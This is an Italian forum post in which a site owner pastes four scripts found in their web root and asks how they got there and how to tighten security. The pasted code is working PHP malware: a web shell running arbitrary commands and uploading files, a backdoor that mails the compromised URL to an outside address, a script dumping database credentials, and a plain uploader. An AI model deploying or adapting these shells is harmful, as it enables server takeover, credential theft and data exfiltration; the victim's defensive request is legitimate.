cmd11
cookie_load
diaa
f_index
sono tutti e 4 degli script che ho trovato nella cartella di root, come ci sono finiti ? esiste qualcosa per massimizzare le protezioni?
cmd11 e' uno script che permette l'upload di file nelle cartelle del sito
Codice: Seleziona tutto
<?php
set_magic_quotes_runtime(0);
print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
print "<center><h1>#worst @dal.net</h1></center>";
print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
print "<center><h1>Watch Your system Shany was here.</h1></center>";
print "<center><h1>Linux Shells</h1></center>";
print "<hr><hr>";
$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == "" ) {
$currentWD = $SCWD;
}
print "<table>";
print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
print "</table>";
print "<hr><hr>";
if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}
print "<form method=post enctype=\"multipart/form-data\"><table>";
print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
print "</table></form><hr><hr>";
$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);
if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "<center><b>Error while uploading file!</b></center>";
} else {
print "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "</pre><b>File uploaded successfully!</b></center>";
}
} else {
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system($currentCMD);
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
}
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ HalT Fucks Your mama - SUCK | <a href=http://FUCK>http://FUCK</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
?>
<?
$cmd = $_POST['cmd'];
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
/tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<",
"<",
$output));
$stat = $_POST['stat'];
if ($stat=="ok") {
} else {
$web = $_SERVER["HTTP_HOST"];
$fie = $_SERVER["SCRIPT_NAME"];
$injeck = $_SERVER["REQUEST_URI"];
$body = "New web hacker \n\n$web$fie \n\n inject e : \n $injeck \n\n Ups Ga Sengaja";
mail("special-3131313113311@live.com","$web$fie Hacked","$body");
}
exit;
?>
Codice: Seleziona tutto
<title>Shell uploader By HalT</title>
<html>
<body>
<form enctype='multipart/form-data' action='diaa.php' method='post'>
Choose a file to upload: <input name='uploadFile' type='file' />
</select>
<input type='submit' value='Upload File' />
</form>
</body>
</html>
<?
$pathfile='';
include 'includes/configure.php';
mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die(mysql_error());
echo ' MySQL: ON ';
echo '<br/>';
mysql_select_db(DB_DATABASE) or die(mysql_error());
echo 'DB Connected ';
echo '<br/>';
echo 'DB server : '.DB_SERVER.' ';
echo '<br />';
echo 'DB user name : '.DB_SERVER_USERNAME.'' ;
echo '<br />';
echo 'DB Password : '.DB_SERVER_PASSWORD.'';
echo '<br />';
echo 'DB Name : '.DB_DATABASE.'';
echo '<br/>';
echo '<br/>';
move_uploaded_file($_FILES['uploadFile']['tmp_name'],'' .$_FILES['uploadFile']['name'])
?>
Codice: Seleziona tutto
<?php
if(isset($_FILES["userfile"]["name"])){
$uploaddir = getcwd() . "/";
$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
echo "<p>";
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "Upload failed";
}
echo "</p>";
echo "<pre>";
echo "Here is some more debugging info:";
print_r($_FILES);
if ($_FILES["userfile"]["error"] == 0){
echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}</a><br><br>";
}
echo "</pre>";
}
echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">";
echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />";
echo "Send this file: <input name=\"userfile\" type=\"file\" />";
echo "<input type=\"submit\" value=\"Send File\" />";
echo "</form>";
echo "The Roof Is On Fire";
exit;
?>
consigli?